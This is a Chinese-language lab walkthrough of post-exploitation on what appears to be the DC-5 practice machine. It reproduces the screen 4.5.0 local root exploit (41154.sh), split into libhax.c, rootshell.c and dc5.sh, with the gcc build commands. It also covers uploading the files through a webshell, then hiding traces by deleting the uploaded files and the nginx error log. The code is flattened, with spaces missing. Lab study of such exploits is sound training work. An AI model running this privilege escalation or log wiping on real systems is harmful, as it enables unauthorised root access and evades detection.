后渗透测试
查看提权文件
在kali上输入python -c ‘import pty;pty.spawn(“/bin/bash”)’
找到具有SUID的文件,文件,用来提权。find / -perm -u=s -type f 2>/dev/null
查找EXP, 重新打开一个终端,在kali中通过命令searchsploit查看screen-4.5.0的漏洞。
创建脚本
复制的脚本没办法直接执行,所以需要将其拆分为多个文件处理。
在kali的root文件夹下新建文件,命名为libhax.c。
将41154.sh脚本中的第一部分内容复制到libhax.c文件 。
将脚本中选中内容复制到libhax.c文件中。
在libhax.c文件中添加所选中的语句
libhax.c的内容:(第一个文件内容)
#include<stdio.h>#include<sys/types.h>#include<unistd.h>__attribute__ ((__constructor__)) voiddropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); }
将libhax.c文件ctrl s保存,然后打开终端窗口,在终端窗口里执行命令
用来生成动态库文件libhax.so
gcc-fPIC-shared-ldl-olibhax.solibhax.c
在kali的root文件夹下新建文件命名为rootshell.c,用来处理脚本中的第二部分内容
将41154.sh脚本中的选中部分,复制到rootshell.c文件中
在rootshell.c文件中,第二行添加语句#include<unistd.h>,在文件的倒数第二行,删掉一个多余的NULL .
rootshell.c的文件内容:(第二个文件内容)
#include<stdio.h>#include<unistd.h>intmain(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh",NULL); }
保存并退出rootshell.c文件,在kali的终端窗口中,输入命令gcc rootshell.c –o rootshell,用来生成一个可以执行的二进制文件.
gcc-orootshellrootshell.c
将41154.sh脚本中的最后一部分内容,复制到dc5.sh文件中
dc5.sh文件内容:(最后一个文件内容):
echo"[+] Now we create our /etc/ld.so.preload file..."cd/etcumask000#becausescreen-D-m-Lld.so.preloadecho-ne"\x0a/tmp/libhax.so"#newlineneededecho"[+] Triggering..."screen-ls#screenitselfissetuid, so... /tmp/rootshell
在终端窗口中,按esc,再按shift + : ,窗口底部应该出现冒号,输入set ff=unix,回车
在kali中复制刚刚制作好的三个文件,到Windows中的任意位置。
使用蚁剑上传文件提权
打开蚁剑,找到/tmp目录,右键上传文件
给dc5.sh文件添加可执行权限
chmod+xdc5.sh
执行脚本 ./dc5.sh
拿到flag
清理痕迹
删除上传的三个提权文件
删除/var/log/nginx/error.log的日志文件
渗透测试报告
使用报告文档交流在渗透测试过程踪做了哪些,如何做,以及最为重要的—客户如何修复你发现的安全漏洞与弱点。